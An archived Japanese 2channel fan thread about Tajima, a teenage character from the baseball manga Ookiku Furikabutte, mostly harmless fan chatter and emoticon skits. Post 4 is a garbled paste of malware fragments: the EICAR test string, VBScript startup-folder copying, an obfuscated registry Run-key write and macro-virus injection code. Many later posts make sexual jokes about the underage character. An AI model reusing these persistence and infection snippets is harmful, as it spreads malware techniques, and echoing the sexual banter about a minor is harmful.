5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【がんばっから】おお振り 田島悠一郎 3打点目【よろしくな!】

1 :名無しかわいいよ名無し:2007/11/09(金) 23:26:48 ID:C7lPFrVH
おおきく振りかぶっての我らが天才4番スラッガー、田島悠一郎のスレです。
我々じゃ計り知れない精神と能力を持つ田島神を崇め称えましょう。

「田島はスーパーヒーローだなぁ」

次スレは>>970が立ててください。無理なら980に頼んでください。

前スレ
【打つよ!】おお振り 田島悠一郎スレ 2打点目【ゲンミツにっ】
http://anime2.2ch.net/test/read.cgi/cchara/1189079617/
【おお振り】田島 悠一郎スレ【ほらねー!!】
http://anime2.2ch.net/test/read.cgi/cchara/1179490149/


2 :名無しかわいいよ名無し:2007/11/09(金) 23:30:48 ID:sbRbqrgZ
>>1乙!

3 :名無しかわいいよ名無し:2007/11/09(金) 23:44:52 ID:Wpv8Ov6U
(*`▽´)<乙バッチ!

無事に新スレ移行できたね。前スレであれだけ話し合ったのにどんだけwww
でもやっぱり単独スレは嬉しいな

4 :名無しかわいいよ名無し:2007/11/10(土) 00:02:30 ID:E3tqe+EG
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しかわいいよ名無し:2007/11/10(土) 00:33:15 ID:Ku+vMI3s
  、ヽlノiノ_  yvMレy 
  ヾ/ハノヘゝ  ywwvゞ
  '`c*゚◇゚)ミc*`▽´)ミ >>1乙バッチー!
 γ 二つ つ 二つ つ
  {   (  {   ( 
  ヽ,_)ヽ,_) ヽ,_)ヽ,_)

6 :名無しかわいいよ名無し:2007/11/10(土) 07:53:25 ID:UJOqwicB
>>1ゲンミツにおーーつっっ!

次スレ経ったは良いが、統合の話は『他スレ住民の意見を待つ』って事でFA?

7 :名無しかわいいよ名無し:2007/11/10(土) 08:05:22 ID:+tXU/h8W
>>1
ゲンミツに乙!>(`▽´*)

8 :名無しかわいいよ名無し:2007/11/10(土) 08:37:34 ID:Rqh3hFdy
>>1乙!

統合の話は、これからアフタ→ゲーム→コミック→アフタ
の怒涛の流れが終わってからで、いいんじゃないかな。

9 :名無しかわいいよ名無し:2007/11/10(土) 11:27:30 ID:aI9RpxCu
>>1

ごめん前スレ970なんだけどスレ立ては980だと思い込んでた
迷惑かけてごめんなー

統合は単独が寂れて落ちるようになってからでもいいんじゃないか?

10 :名無しかわいいよ名無し:2007/11/10(土) 12:54:01 ID:PJcRLfBi
(*`▽´)<1 乙カレ〜 食うか?

11 :名無しかわいいよ名無し:2007/11/10(土) 16:41:51 ID:HDZFkc8u
ちょwまさかの修ちゃんww

12 :名無しかわいいよ名無し:2007/11/10(土) 18:15:49 ID:Y6swIzzi
前スレ>>1000まさかの叶www

13 :名無しかわいいよ名無し:2007/11/10(土) 23:13:37 ID:R+2eeo5w
>>1000は田島で来ると思い込んでいた俺は勝ち組?

14 :名無しかわいいよ名無し:2007/11/11(日) 00:24:39 ID:uZgZjMzJ
叶の顔文字知らずに田島様だと思ってた

15 :名無しかわいいよ名無し:2007/11/11(日) 00:36:16 ID:oV6F0N83
(*`▽´)<口が違うもんね!

16 :名無しかわいいよ名無し:2007/11/11(日) 05:22:19 ID:iy1SbxX/
記念に前スレが落ちる前に995-1000を誰かこっちにコピペしてくれまいか。
自分が貼ってやりたいけど携帯しかないんだ…

17 :名無しかわいいよ名無し:2007/11/11(日) 06:52:37 ID:qTO7twnY
(*`▽´)? 何の記念?叶スレに貼るのか?

18 :名無しかわいいよ名無し:2007/11/11(日) 07:54:11 ID:YkWuaxML
…ん?ここに貼るんじゃないのかな?
他キャラが出張して来てくれるの嬉しいね
貼ってやりたいけど、自分マカーなので口のBが文字化けするかも

19 :名無しかわいいよ名無し:2007/11/11(日) 08:22:49 ID:qTO7twnY
既に文字化けしとるね。うちもMacなので無理だ… 試し>

そういえば田島の顔文字って、口以外の部分が他キャラと兼用だから
別の表情作れないんだな

20 :名無しかわいいよ名無し:2007/11/11(日) 08:25:49 ID:qTO7twnY
995 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 14:42:00 ID:tIupedJF
>>985乙!!

1000までカウントダウンスタート!5!

996 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 14:55:20 ID:aywepos1
(^ー^;)<4!

997 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 15:12:25 ID:IFAN0kBU
(*゚◇゚)<3!

998 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 15:21:21 ID:HDZFkc8u
(仝ω仝)<2

999 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 15:21:56 ID:R8w+HB3I
(*´∀`)<1!

1000 名前:名無しかわいいよ名無し メェル:sage 投稿日:2007/11/10(土) 15:24:08 ID:ssJKev6A
(*`凵L)1000

21 :名無しかわいいよ名無し:2007/11/11(日) 08:30:10 ID:qTO7twnY
マカーでも平気そうだったので前スレ1000貼ってみますた>20
叶だけでいいのか判らんかったので、一連の流れを。
これで大丈夫だろか。

22 :名無しかわいいよ名無し:2007/11/11(日) 09:14:54 ID:ZUrBgu7G
比較的新しいMacだと大丈夫っぽいよね。
自分も買い替えたら叶の口がちゃんと表示されるようになったし。
と、スレ違いすまん。

23 :名無しかわいいよ名無し:2007/11/11(日) 11:38:48 ID:iy1SbxX/
>>20dクス!そうそう、これこれ。
前スレがあんまりきれいな終わり片だったからさ。
しかしメェルってどきどき見るけどマックでコピペするとなるのか。なんかかわいいなw

24 :名無しかわいいよ名無し:2007/11/11(日) 13:51:26 ID:V1KHXomy
前スレの995だけど
もし自分のときに田島の顔文字書いてたらいい感じになったのに
と少し後悔

まあ今更だからいいんだけど。

25 :名無しかわいいよ名無し:2007/11/11(日) 14:30:52 ID:rzluI+U+
全く気付かずに貼って、メェルって何だ?と暫く考えてしまったw
Macだからというより、マカー用っつう専ブラ使ってるとこういう
表示になるんだよ。>>23

ところで11月号では捕手田島が全力ストレートばかり要求するので
ハラハラしていたが、モモカンのサイン読まれてしまった今となっては
あのままギャンブル性ある投球のがまだ良かったんかな…?
交代前までの流れを覚えて配球組んでしまった分、相手にも球種予想
され易いし。かと言って球威無いから考え無しでは自滅だろうか…
 しかしいっぱいいっぱいとはいえ、それが実践できる田島に惚れ惚れするw

26 :名無しかわいいよ名無し:2007/11/12(月) 00:06:19 ID:/e5R8wEk
>>20
カウントダウン4が栄口だったから
3は沖を貼ろうと思ってたんだけど、間に合わなくて残念。

27 :名無しかわいいよ名無し:2007/11/12(月) 00:31:25 ID:yRcAyT/2
俺は前スレ>>1000を田島にしようとしてた。

が、乗り遅れた。

28 :18:2007/11/12(月) 06:34:49 ID:liRZe6TJ
>>20
おお、どうもありがとう
自分も今年買った新しいMacなんだが…表示はされてもコピペすると文字化けする不思議

PCの話が続いて、そういや田島も授業でパソコン触ったりしてるんだろうなーと思い至った
田島がパソコン使ってるトコとか想像出来ない

29 :名無しかわいいよ名無し:2007/11/12(月) 07:35:35 ID:C1q3uJ65
>>>

30 :29:2007/11/12(月) 07:36:43 ID:C1q3uJ65
すまんミスった

>>28
想像は出来る
でもそのパソコンが田島が使ったあとどうなるかは想像もつかない…

31 :名無しかわいいよ名無し:2007/11/12(月) 09:54:00 ID:NK+JhqM3
>29
ブラウザの履歴がエロサイトばっかりとかw
しかし田島には、出版業界に優しいエロ本派でいてほしいな

本人に興味があるならパソコンだってかなり使いこなせると思うんだが
野球と食いもんとオナn以外にどん位興味あるんだろうなw

32 :名無しかわいいよ名無し:2007/11/12(月) 10:03:50 ID:TSPYffed
>>31
ハムの飼育と園芸

33 :名無しかわいいよ名無し:2007/11/12(月) 13:10:22 ID:g4DUJWK3
農業のプロに囲まれて暮らしていて園芸もなかろう

ブラウザに履歴が残るの知らずにYahooで「エロ画像 無料 巨乳」とか残して
後々兄貴に散々バカにされるとかそんなんだろw
あれは本当に恥ずかしい

34 :名無しかわいいよ名無し:2007/11/12(月) 14:09:03 ID:TSPYffed
>>33
田島だけの小さい菜園があるんだよ、庭に!
そこでミニトマトとオクラ作ってんの!

35 :名無しかわいいよ名無し:2007/11/12(月) 14:13:27 ID:mw/Q28Ef
田島は恥じらうなんて高等な感情など持ち合わせていなさそうなんだが。

女子のいる前であんな発言しちゃっう位だし。
だがそこがいい。

36 :名無しかわいいよ名無し:2007/11/12(月) 15:28:23 ID:j2jBi2A2
>>35
授業中に堂々とエロサイト見てて、なにかの拍子に画面がフリーズ

「あれっ?画面動かなくなったぁー!もうちょい下にストローク(←誤。正しくはスクロール)しないと肝心な部分が見えないじゃん!」

むっとしながら必死にマウスカチカチ暴れさす田島様
画面はエロ画像(きわどい所でフリーズ)
背後には殺意を抱く先生


こんな日常を想像した

37 :名無しかわいいよ名無し:2007/11/12(月) 16:01:17 ID:72cly0NS
>>36
必死にマウスカチカチな田島様ワロタw

むしろ今後本誌で普通に恥じらう田島を見たりしたら、
色々な意味で衝撃だw
田島にとっての認識はエロ=興奮気持ちいいヒャッホー てな感じで、
いやらしいとか恥ずかしいってイメージ無いのかもな。
だからと言って周りも皆田島みたいな訳じゃないんだがw

38 :名無しかわいいよ名無し:2007/11/12(月) 16:23:39 ID:mw/Q28Ef
アニメの合宿のとき、他のみんながモモカンとシガポの仲を想像しちゃって「萎え〜」になってるときに田島だけ「ポカーン」て顔してたのが可笑しかった。
なんからしくて。
田島は性欲は人一倍のようだけど男女の機敏や女心はまだ難しそうだ。

39 :名無しかわいいよ名無し:2007/11/12(月) 17:18:07 ID:x9tpVzrw
田島の恥じらいといったらストライク見過ごしくらいか

40 :名無しかわいいよ名無し:2007/11/12(月) 20:10:00 ID:RTeFKs11
>>39
アレは萌えたなぁ
ストレートじゃーーんの裏には、何やってんの? オレ! みたいな思いがあ
るんだって解ったらなんか、田島なんだなぁって思う

普段の田島と野球してる田島が違い過ぎるから、二つを繋ぐものが見れて田島
信者として純粋に嬉しかったよ

41 :名無しかわいいよ名無し:2007/11/12(月) 21:22:33 ID:j2jBi2A2
>>38
恥ずかしがったり、変に女を語り出すのは中学生くらいだな
Hなこと覚えて頭すっからかんエロフィーバーしてるのは小学5年生くらいじゃないか?


・・・って自分で分析しておきながらだが、田島様の脳内は小学生なのかww
天使かwww

42 :名無しかわいいよ名無し:2007/11/12(月) 21:55:14 ID:dApzYyFe
あの合宿でのポカーンは、逆に大人なイメージで考えてた。異端かなw

なんつーか、監督と顧問が付き合ってたら気まずいよなーっていう
雑念が無くて、完璧にモモカン=野球部の監督であって、モモカンが
誰と付き合ってようがその認識に変わりは無いという感じで。
確かに単なる天然かも知らんがw

野球関係以外では田島も普通に女に興味あると思うよ?
おまけ漫画で千代ちゃんの「かわいい子が居る」にも反応してたし

>>39
あの田島の顔は良かったw
ああいう顔すんの珍しくて貴重だし、それが野球やってる時なのが
田島らしい。確かに唯一の恥じらい顔かもなw

43 :名無しかわいいよ名無し:2007/11/12(月) 23:59:15 ID:gZMX1yc9
おまいらの萌え文読んでたら田島とエロ画像を見たくなってきたわ。

44 :名無しかわいいよ名無し:2007/11/13(火) 05:17:14 ID:wYBIUNM5
何故この流れでエロ画像を見たくなるw

45 :名無しかわいいよ名無し:2007/11/13(火) 07:45:37 ID:SYD7gKip
>>43
田島「と」エロ画像なのか
田島「の」エロ画像なのか

俺は後者がいいなぁ…

46 :名無しかわいいよ名無し:2007/11/13(火) 07:58:46 ID:Gkj1is1Y
(*`▽´)<後者キボンヌだな!

47 :名無しかわいいよ名無し:2007/11/13(火) 08:09:44 ID:mBojggU+
>>45
田島はエロ口走ってるけど、本人は爽やかだからなあ
後者は非常に貴重な気がする
前者はエロ画像を見る田島なら別な期待を胸に賛同するけど、普通に別個なら見れるし貴重ではないし・・・




まあ早い話が後者見たいんですけれども

48 :名無しかわいいよ名無し:2007/11/13(火) 10:17:14 ID:GMrF/axj
(*`▽´)<お前ら変態だな。そんなに見たいのか?しょうがねーな








(*`▽´)♪<(脱ぎ脱ぎ…)


(冫、)<やーめーろっ!通報されっぞ!

(∵・д・)<俺はもう慣れたぜ


(;゚◇゚)<田島君 風邪 引く よ!


(仝ω仝)<風邪引いたら試合に出られなくなるぞ


(*`▽´)<ちぇー…

49 :名無しかわいいよ名無し:2007/11/13(火) 10:18:26 ID:5mfB5dip
田島のエロ画像って田島の好きなエロ画像のことだと思ってたw
おまいらHだなw

50 :名無しかわいいよ名無し:2007/11/13(火) 12:17:41 ID:5JLy3746
>>48
泉www

51 :名無しかわいいよ名無し:2007/11/13(火) 15:26:07 ID:X3VFioku
>>49
Hという素直な表現が可愛くて思わず吹いたw

52 :名無しかわいいよ名無し:2007/11/13(火) 15:44:14 ID:optbg3pv
田島の部屋の家捜しがしたいってことか?
モノスゲエグイのが出てきちゃったらどうするよ?

53 :名無しかわいいよ名無し:2007/11/13(火) 16:15:42 ID:PD3ct2oT
兄ちゃん居るからエロ本手に入れるの不自由しなさそうだなー

54 :名無しかわいいよ名無し:2007/11/13(火) 16:42:29 ID:DYeRAxMO
>>52
それはそれで惚れ直すかも知れんw

俺は>>43
田島(の画像)とエロ画像見たい だと思ったわw
この二つを並べて43はどんなイマジネーション展開するんかと謎だったw

55 :名無しかわいいよ名無し:2007/11/13(火) 20:29:43 ID:5mfB5dip
>>54
そりゃもちろん田島がその画像でオナry

56 :名無しかわいいよ名無し:2007/11/13(火) 20:33:23 ID:zF+qoJ9C
田島の画像で田島が、ですか。

57 :名無しかわいいよ名無し:2007/11/13(火) 21:13:18 ID:PD3ct2oT
今日はカオスだなー

58 :名無しかわいいよ名無し:2007/11/13(火) 21:35:12 ID:XS3Ql1H1
(*`▽´)<田島スレの勢いは誰にも止められないぜ!

59 :名無しかわいいよ名無し:2007/11/13(火) 22:35:17 ID:mBojggU+
この流れだから言える









スレ立てて大正解だったw

60 :名無しかわいいよ名無し:2007/11/13(火) 22:36:33 ID:mBojggU+
>>57
そしてカオスがオカズに見えたミラクル
もう止められない

61 :名無しかわいいよ名無し:2007/11/14(水) 01:44:16 ID:wPJ4IiWG
おまえら田島もエロも大好きだなw
そんなおまえらにプレゼント
http://ranobe.com/up/src/up241489.gif
重くてごめんよー

62 :名無しかわいいよ名無し:2007/11/14(水) 02:48:11 ID:OshiH0eH
>>61
この顔すげー焦ってるよなw
改めて見返すと必死すぎて笑える

だがそんな田島が大好きだwww

63 :名無しかわいいよ名無し:2007/11/14(水) 03:14:00 ID:SjPUCcrS
>>61
やべぇ噴いたw
主将!副主将!主力選手ですがいいんですかーーっ

64 :名無しかわいいよ名無し:2007/11/14(水) 07:45:23 ID:B4SLDSPu
それもいいけど、「ストライク見過ごし」 「ストレートじゃーん」の田島を誰か見せてくれないか!

65 :名無しかわいいよ名無し:2007/11/14(水) 08:46:33 ID:cJWf4hPY
>>61
プロティン噴いた

でも田島可愛いよ

66 :名無しかわいいよ名無し:2007/11/14(水) 10:15:05 ID:rfg+SxeR
>>61
本当に破裂すると思ってたんだろうな・・・w

67 :名無しかわいいよ名無し:2007/11/14(水) 13:00:06 ID:a9il7NTW
(*`▽´)<毎日一回だけど今日は休みだからオ(ryしまくりだぜ


(*`▽´)<(あーでも…やりすぎは良くないよな…爺ちゃん達の手伝いしよっと!)

68 :名無しかわいいよ名無し:2007/11/14(水) 18:22:19 ID:jIslG8Dv
>>67
今日県民の日で休みだったのかー
この時期はもうオフシーズンか?

69 :名無しかわいいよ名無し:2007/11/14(水) 21:35:20 ID:A6xbJODG
>>61
爆笑したwwいい笑いをありがとうw


70 :名無しかわいいよ名無し:2007/11/15(木) 03:48:09 ID:m9eAYbOr
>>66
そこまで・・と否定しかけてゲンミツを思い出す。
意味の取り違い、もしくは誰かに嘘吹き込まれたかもしれないなw

71 :名無しかわいいよ名無し:2007/11/15(木) 14:46:07 ID:tKmD/GaU
>>70
『ゲンミツ』の件があるから意味の取り違えは可能性大だなー


田島『ハレツってなんだっけ?』
友達『あぁ、精子ためたらドカンといっちゃうって事じゃね?(冗談)』
田島『……チ〇コ爆発すんのか……』

72 :名無しかわいいよ名無し:2007/11/15(木) 15:40:21 ID:37fFjiTX
>>71
ちょwwwww
ありそうな会話wwwww


脳内で友達の台詞が泉の声で聞こえた
嘘吹き込むなよ泉w

73 :名無しかわいいよ名無し:2007/11/15(木) 18:30:06 ID:jUYx5cWY
泉はむしろ

(;`▽´)<チンコハレツすんのか!!
(友∀達 )<そうそうw

(∴・д・)<俺はもう慣れたぜ

74 :名無しかわいいよ名無し:2007/11/15(木) 18:45:25 ID:bIp3a3HZ
チンコがハレツすることに慣れてるみたいだな

75 :名無しかわいいよ名無し:2007/11/15(木) 18:54:59 ID:WxLTO2Ef
>>71
バカヤロー吹いたじゃねーかwwwww

76 :名無しかわいいよ名無し:2007/11/15(木) 20:54:35 ID:taYY+dK9
>>74
ちょwどんだけ溜めてんだww

77 :名無しかわいいよ名無し:2007/11/15(木) 21:00:16 ID:04MWrUvv
>>71
田島は自分で辞書引く事を覚えて下さい…

78 :名無しかわいいよ名無し:2007/11/15(木) 21:07:45 ID:C68oPOvv
(*`▽´) < ゲンミツってなんだっけ
(仝ω仝) < ググれ

79 :名無しかわいいよ名無し:2007/11/15(木) 22:53:32 ID:JkfqlfJj
>>45
すまん、後者を書こうとしてたわwww

80 :名無しかわいいよ名無し:2007/11/15(木) 23:50:19 ID:sW8+4nTO
>>79
一瞬、田島のエロ画像を描こうとしてたのかとおもたww

81 :名無しかわいいよ名無し:2007/11/16(金) 05:55:38 ID:qq8DEt2X
田島のエロ画像か・・・モモカンに「欲しい?」と聞かれたら「欲しい!」といってしまいそうだ。


82 :名無しかわいいよ名無し:2007/11/16(金) 14:42:31 ID:Mw7MBsbT
最近田島スレにも変態が多いな

83 :名無しかわいいよ名無し:2007/11/16(金) 14:49:28 ID:qCxpL6ps
そんな日もあるよ!人間だもの!

84 :名無しかわいいよ名無し:2007/11/16(金) 16:33:53 ID:jZ383MeX



只今、田島スレには神が憑いています





85 :名無しかわいいよ名無し:2007/11/16(金) 17:21:28 ID:sVyIci7f
変態っつーか、田島の場合下ネタデフォだからなあw

しかし>>66読んで、こん時田島便所で抜いたのかなと書き込み
そうになって、板的にどこまでおkなのか判らなくなったw
って、書いてるけども。すまんw

田島は下ネタ喋ってても本人が爽やかなのが凄い。

86 :名無しかわいいよ名無し:2007/11/16(金) 19:57:36 ID:qq8DEt2X
>>84
「田島神」


87 :名無しかわいいよ名無し:2007/11/16(金) 20:13:43 ID:G5HEFbhY
>>85
子供がうんこちんこ言ってんのと同じようなもんか
便所で抜く前にぶっ倒れて寝ちゃってそうだな田島は

88 :名無しかわいいよ名無し:2007/11/16(金) 21:13:53 ID:7OUmUpmH
そして翌朝破裂というわけか

89 :名無しかわいいよ名無し:2007/11/16(金) 21:19:51 ID:EkgvJOB9
ぶっ倒れるっつーか、行為の最中に寝ちゃってそうだよね田島って

それが兄貴に見つかったり……

ああ考えるだけでも恐ろしい

90 :名無しかわいいよ名無し:2007/11/16(金) 21:20:02 ID:G5HEFbhY
(*`▽´) <やっべ、出ちゃった!
全然気にしなそうな男らしい田島萌え

91 :名無しかわいいよ名無し:2007/11/16(金) 22:10:14 ID:qZQhiXMw
田島みたいに明け透けな子って家庭がそういうふいんき(漢字がryなケースが多いよ。
たぶん兄弟両親も日常的にエロトークしてるとおもわれ。

92 :名無しかわいいよ名無し:2007/11/16(金) 22:13:59 ID:qq8DEt2X
>>91
雰囲気=ふんいき

とりあえずやだなその家族設定w

93 :名無しかわいいよ名無し:2007/11/16(金) 22:26:22 ID:9g3Z/6pL
ふいんきで合ってんだよwww

94 :名無しかわいいよ名無し:2007/11/16(金) 22:27:27 ID:qq8DEt2X
雰囲気
出典: フリー百科事典『ウィキペディア(Wikipedia)』

雰囲気(ふんいき、英:ambience)とは、ある特定の場所や事物、人物を取り巻いて、感じられる光や音、匂い、気配などを総体として捉えて語ったもの。 類語に場の空気がある。

語源はアセチレン・酸素混合気体。

化学でいう雰囲気(atmosphere)は、ある特定の気体やそれを主とした混合気体の状態、またはその気体の条件下にある状態を指す。

ふいんきなる読み方があるが標準語としては誤りである。

95 :名無しかわいいよ名無し:2007/11/16(金) 22:37:00 ID:23xZQsx4
これはどこまでがネタなのか未だにわからないんだが
これを貼ることで解決すると私は思っている

ふいんき(←なぜか変換できない)のガイドライン10
http://ex20.2ch.net/test/read.cgi/gline/1193054078/l50

96 :名無しかわいいよ名無し:2007/11/16(金) 22:39:23 ID:kmJjTwVl
ふいんき(何故か変換ryネタは息が長いよな。
俺もまだ時々使うしw


田島も口語ではふいんきって言ってそうだw

97 :名無しかわいいよ名無し:2007/11/16(金) 22:47:14 ID:qq8DEt2X
合ってる間違ってるの議論はもう終了でいいですか?じゃあ?雰囲気で変換できるしな。

98 :名無しかわいいよ名無し:2007/11/16(金) 22:47:29 ID:aSZ63m6t
>>96
言葉の言い間違いは
じいばあや ひいじいに正されるんじゃないだろうか

99 :名無しかわいいよ名無し:2007/11/16(金) 22:56:34 ID:kmJjTwVl
ツッコミはマジレスだったのか…

>>98
そういえばそうか。何気に国語に強い田島だったりして。
でも「ゲンミツ」に関しては今のままで居て欲しいw

100 :名無しかわいいよ名無し:2007/11/16(金) 23:30:53 ID:qZQhiXMw
>>91ですがなぜか思ってもみなかった流れに…

101 :名無しかわいいよ名無し:2007/11/17(土) 00:06:26 ID:Eh6xk66r
(*`▽´)<オレのケータイ、出ない漢字が多くてさ

102 :名無しかわいいよ名無し:2007/11/17(土) 00:17:17 ID:nei6gA8s
久々にふいんき(ryで笑ってしまった


103 :名無しかわいいよ名無し:2007/11/17(土) 00:39:09 ID:Lf+92nJu
>>100
どーんまーい
本スレでも確かこんな流れあったぞ?w
おお振り関連は2ch来たばっかの人も多いんだろう。

田島は携帯メールも1行とか多そうだ。
その分回数も多そうだが>三橋の受信BOXみたいに

104 :名無しかわいいよ名無し:2007/11/17(土) 08:16:30 ID:vTBq4t2V
ふいんき(ryにマジレスまでがワンセットだと思ってた自分…

105 :名無しかわいいよ名無し:2007/11/17(土) 10:13:12 ID:ZC5k2+AE
ふいんき(何故か変換ryは忘れた頃に登場するな
めいっぱいマジレスされるとなんだか照れちゃうw

まあ中には、素で間違えて使ってるたまにはいるんだろうが。


106 :名無しかわいいよ名無し:2007/11/17(土) 15:47:55 ID:K3yo4/cT
>>89
これ思い出したw
ttp://blog.livedoor.jp/insidears/archives/51174970.html

107 :名無しかわいいよ名無し:2007/11/17(土) 16:28:38 ID:3p4a1msX
田島はぶっ倒れる前にキチっとする事しそーな気がする
そして終わった直後に電池切れ

108 :名無しかわいいよ名無し:2007/11/17(土) 17:05:30 ID:KEb5qx70
>>106
ちょwwwハゲワロタw
こん位なら漫画的には可愛げがあっていいなw

109 :名無しかわいいよ名無し:2007/11/17(土) 20:14:36 ID:urMWtcEe
でも田島は野球に支障をきたす事はしないだろうから、きっと程よいところで
止めて寝ちゃうかもしれないね。『明日の朝やればいーや』とか

で、朝練の時とか昼休みとかで高らかにチ〇ンコハレツ話










>>106
確かそのネタ、ニコ動にも有ったな。俯せた弟が不憫極まりない状態だった
これ以上はスレチですな

110 :名無しかわいいよ名無し:2007/11/17(土) 23:16:21 ID:1LAl/fQ9
そういえば、田島は母親に似てないから父親似かな。
他の兄弟は母親似なんだろうか。田島ファミリースゲー見てぇ。
あと前に本スレで出てたけど、
作者インタビューで田島の身長は連載直前に低くしたとあったから
作者の頭の中では、既に身長が伸びた田島が出来てるんだな

111 :名無しかわいいよ名無し:2007/11/18(日) 00:49:35 ID:kO1xSRIB
どうしてもニュースの但馬牛に反応してしまう

112 :名無しかわいいよ名無し:2007/11/18(日) 01:44:46 ID:WJuN0yM3
>>106
ちょwwww クソワロタww
なんという神スレwww
画像が見れなかったのが残念。

田島んちがこういうの日常茶飯事で特に珍しくもないとかだったら萌えるなあ。

113 :名無しかわいいよ名無し:2007/11/18(日) 03:53:44 ID:4+itf8aU
>>111
たじまピーマンもあるんだぜ

114 :名無しかわいいよ名無し:2007/11/18(日) 06:15:57 ID:Vvlmx37F
会津田島って地名にときめいたぜ
福島県なんだけど
ググったら田島小学校やら田島郵便局やらあるらしいぜ

115 :名無しかわいいよ名無し:2007/11/18(日) 08:09:17 ID:TSH9gv+v
(*`▽´)<西浦がある埼玉県さいたま市にも○○区田島 があるぜ。

116 :名無しかわいいよ名無し:2007/11/18(日) 08:22:03 ID:KA3JVACt
福島県田島町は、残念ながら平成の大合併で南会津町になりました…
でも会津田島駅やら田島高校やら道の駅たじまはあるよ。

117 :名無しかわいいよ名無し:2007/11/18(日) 09:51:58 ID:dBkHgvx5
>>106
盛大に吹いたwww
これが田島だったらいいなw



118 :名無しかわいいよ名無し:2007/11/18(日) 10:25:38 ID:6iwaTItO
>>106
いやこれはもう田島以外の何者でもないww
久々に萌えたw

119 :名無しかわいいよ名無し:2007/11/18(日) 12:33:14 ID:+92rZYOs
西浦和駅の住所は桜区田島だったはず。どーでもいいけど

120 :名無しかわいいよ名無し:2007/11/18(日) 13:33:00 ID:ucXRClLt
>>106
この流れで真っ先に思い出したよこれ
田島はきっと男らしく仰向けだな
ティッシュで包んだまま豪快に寝てるはず
兄ちゃん達は気にも止めず「まーたチンコ出して寝てるよ」って

121 :名無しかわいいよ名無し:2007/11/18(日) 13:44:30 ID:pslILAJ4
ttp://toku.xdisc.net/cgi/up/vcc/nm13158.jpg
むせて涙目w

122 :名無しかわいいよ名無し:2007/11/18(日) 14:54:05 ID:RNLw6HZj
>>121
ちょ!!何これ!?
この画像の詳細kwsk

123 :名無しかわいいよ名無し:2007/11/18(日) 15:11:12 ID:pslILAJ4
これは12月に出るDSのゲームのショットだよw
アニメでカットされた所とかもあるようだ^^

124 :名無しかわいいよ名無し:2007/11/18(日) 16:47:21 ID:6iwaTItO
>>121
田島が無邪気でかわいいww
ちょっと迷ってたけどゲーム絶対買うって今決めた

125 :名無しかわいいよ名無し:2007/11/18(日) 18:46:55 ID:dBkHgvx5
これは買うしかねえ!

126 :名無しかわいいよ名無し:2007/11/18(日) 20:35:10 ID:RNLw6HZj
>>122
どもー!!
ゲームのショットだったんか。どうりでアニメで見た事ないのばっかだと思った。

田島様もいいけど個人的には寝てる阿部がツボったww

127 :名無しかわいいよ名無し:2007/11/19(月) 00:34:36 ID:vAqP32Hu
>>121
巣山に水かけられてるの誰だか気になるな…
田島だといいな


三段目右の三橋噴いたwwww

128 :名無しかわいいよ名無し:2007/11/19(月) 00:53:08 ID:qNqP1uPs
>>127
他スレで栄口じゃないかと言っている人がいたけど、髪の長さから見て
田島か栄口かなー
しかしええ笑顔の巣山かっこいいな…

129 :名無しかわいいよ名無し:2007/11/20(火) 01:36:44 ID:xulA+2iS
ゲーム買うつもりなかったんだけど、購入決定だよ…w
12月はゲームの発売に9巻発売に、楽しみが多くてうれしい

130 :名無しかわいいよ名無し:2007/11/20(火) 12:15:32 ID:KNQgd9Se
(*`▽´)<過疎だなあ

131 :名無しかわいいよ名無し:2007/11/20(火) 21:21:11 ID:kgN3gLMw
アフタ発売までガマン

132 :名無しかわいいよ名無し:2007/11/20(火) 21:31:24 ID:RVXAr1li
もうすぐ本誌発売だからまたにぎやかになるさ!
と言いつつ今月田島のターンがあるか心配だ
今回は花井〜下位打線の描写がメインだろうからなあ
でも一コマでも田島が出てたら買うよゲンミツに!

133 :名無しかわいいよ名無し:2007/11/20(火) 23:32:31 ID:0Vk54aMq
田島様のぬいぐるみとか誰か作ってくれないかなぁ
近ごろ寒くなってきたから、夜のお供(性的な意味でなく)に是非とも欲しい

つーか田島と一緒に寝たら暖かそう

134 :名無しかわいいよ名無し:2007/11/20(火) 23:33:26 ID:m1oPOUt3
このところ1話で表裏やってるから捕手田島が見れると思うぜ!

135 :名無しかわいいよ名無し:2007/11/21(水) 00:47:25 ID:aFC9We10
>>133
寒そうにしてたら、毛布ごともそもそ移動してきて
「寒いならくっついて寝よーぜ(*`▽´)」
って一緒に寝てくれそうだ
でも寝相悪くて、顔蹴られて起きそう
で、朝ご飯は田島の分を「これ慰謝料な」って奪い取る
物悲しそうな田島

・・・妄想しすぎた


ぬいぐるみ欲しいなあ・・・(*´Д`)
田島ぐるみー

136 :名無しかわいいよ名無し:2007/11/21(水) 01:51:38 ID:/5tIGn2n
たじぐるみ欲しい…(´ω`*)
本当にあったら速攻予約するよ

寝相悪い田島は、アニメの合宿風景思い出したw
大の字で幸せそーに寝る田島と
田島に乗っかられて悪夢見てそうな花井を見た時は
花井が可哀相だなあと思いながらも、つい笑ってしまった

137 :名無しかわいいよ名無し:2007/11/21(水) 20:39:50 ID:p2jLXHZG
自分と同じ位の体重かそれより軽い奴に、全体重かけて乗っかられても
